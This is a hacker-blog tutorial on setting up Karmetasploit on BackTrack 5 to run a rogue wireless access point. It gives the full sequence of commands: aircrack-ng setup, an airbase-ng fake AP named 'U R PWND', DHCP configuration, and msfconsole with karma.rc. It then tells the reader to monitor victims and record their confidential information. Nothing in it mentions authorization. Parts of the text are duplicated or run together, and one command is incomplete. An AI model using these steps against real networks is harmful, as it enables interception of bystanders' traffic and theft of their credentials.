KARMETASPLOIT- TUTORIAL
11:25 am
KARMETASPLOIT- BACKTRACK 5 TUTORIAL
So what is Karmetasploit?
KARMA is a wireless client attack toolkit and the integration of Karma and metasploit is called Karmetasploit, in 2004 Dino A. Dai Zovi and Shane A. Macaulay did a presentation called "All your layer are belong to us" in that presentation they have described the insecurity of wireless access point and introduced the tool KARMA. This tool acts as wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service they try to access leads to a malicious application.
The above passage gives the basic introduction of KARMA and about Metasploit your can learn from here.
Karmetasploit Tutorial Configuration
If you
are not using backtrack 5 than you must have to install some dependencies like Aircrack-ng
$ svn co
http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
$ make
# make install
#
airmon-ng start [wifi-interface]
For
backtrack like backtrack5 follow the procedure
root@bt:/pentest/exploits/framework3#
wget
Now
here is the need to configure DHCP server so that the Fake AP connect with the
network.
root@bt:/pentest/exploits/framework3#
cat /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
root@bt:~#
gem install activerecord sqlite3-ruby
By we
approx done now the time to restart the wireless interface and start listening.
root@bt:~#
airmon-ng
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1
What
this commands do? These command is used to create a new interface that is rogue
interface or fake AP, now we have to assign IP address and DHCP configuration
so the interface work properly.
root@bt:~#
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0root@bt:~# dhcpd3 -cf
/etc/dhcp3/dhcpd.conf at0root@bt:~# ps aux | grep dhcpd
Karmetasploit Attack Vector
After
configuration you are ready to run karmetasploit and start an attack
root@bt:~#
cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# msfconsole -r karma.rc
The
command will start metasploit and than Karma script start to act as a fake AP
and it will give you the command like this
msf
auxiliary(http) >
When
the victim will start using this AP you are free to monitor all the activities
and you can record of the confidential information.
msf
auxiliary(http) >
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.google.com)
Written by Admin
Chennai hackers connect is a branch of Computer maniac.It is the platform for the HACKERS to connect and start exploiting.
0 comments: